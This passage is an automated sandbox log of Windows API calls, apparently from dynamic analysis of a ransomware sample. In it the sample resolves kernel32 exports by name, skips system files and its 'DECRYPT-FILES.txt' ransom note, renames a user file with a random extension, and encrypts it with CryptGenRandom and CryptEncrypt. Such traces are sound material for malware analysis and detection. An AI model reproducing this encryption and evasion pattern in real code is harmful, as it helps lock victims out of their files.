lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.037] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.037] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.037] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.037] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.037] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.037] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.037] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.037] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.037] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.037] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.037] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.038] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.038] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.038] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.038] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.038] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.038] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.038] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.038] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.038] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.038] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.038] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.038] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.038] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.038] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.038] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.038] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.038] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.038] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.038] lstrlenA (lpString="DELETEATOM") returned 10 [0080.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.039] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.039] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.039] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.039] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.039] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.039] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.039] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.039] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.039] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.039] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.039] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.039] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.039] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.039] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.039] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.039] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.039] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.039] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.039] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.040] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.040] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.040] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.040] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.040] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.040] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.040] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.040] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.040] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.040] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.040] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.040] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.040] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.040] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.040] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.040] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.040] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.041] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.041] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.041] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.041] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.041] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.041] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms") returned 134 [0080.041] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW") returned 141 [0080.041] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.9EgtdW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.9egtdw"), dwFlags=0x0) returned 1 [0080.042] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.042] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.042] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.042] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc606a140, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc606a140, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xa5f178d0, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.automaticDestinations-ms", cAlternateFileName="7E4DCA~1.AUT")) returned 1 [0080.042] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="DECRYPT-FILES.txt") returned -1 [0080.042] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="autorun.inf") returned -1 [0080.042] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="boot.ini") returned -1 [0080.042] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="desktop.ini") returned -1 [0080.043] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="ntuser.dat") returned -1 [0080.043] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="iconcache.db") returned -1 [0080.043] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="bootsect.bak") returned -1 [0080.043] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="ntuser.dat.log") returned -1 [0080.043] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="thumbs.db") returned -1 [0080.043] lstrcmpiW (lpString1="7e4dca80246863e3.automaticDestinations-ms", lpString2="Bootfont.bin") returned -1 [0080.043] lstrlenW (lpString="7e4dca80246863e3.automaticDestinations-ms") returned 41 [0080.043] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="lnk") returned -1 [0080.043] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="exe") returned -1 [0080.043] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="sys") returned -1 [0080.043] lstrcmpiW (lpString1="automaticDestinations-ms", lpString2="dll") returned -1 [0080.043] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0080.043] lstrlenW (lpString="7e4dca80246863e3.automaticDestinations-ms") returned 41 [0080.043] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0080.043] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="7e4dca80246863e3.automaticDestinations-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms" [0080.043] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.044] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=6656) returned 1 [0080.044] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.044] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.045] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.045] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.045] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.046] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.047] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.047] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.047] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.048] CloseHandle (hObject=0x464) returned 1 [0080.048] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.048] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.048] CloseHandle (hObject=0x0) returned 0 [0080.048] CloseHandle (hObject=0x460) returned 1 [0080.049] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.049] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.050] GetTickCount () returned 0x114c801 [0080.050] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.050] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.050] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.050] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.050] lstrlenA (lpString="kernel32.dll") returned 12 [0080.051] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.051] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.051] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.051] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.051] lstrlenA (lpString="ADDATOMA") returned 8 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.051] lstrlenA (lpString="ADDATOMW") returned 8 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.051] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.051] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.051] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.051] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.051] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.051] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.051] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.051] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.051] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.051] lstrcpyA 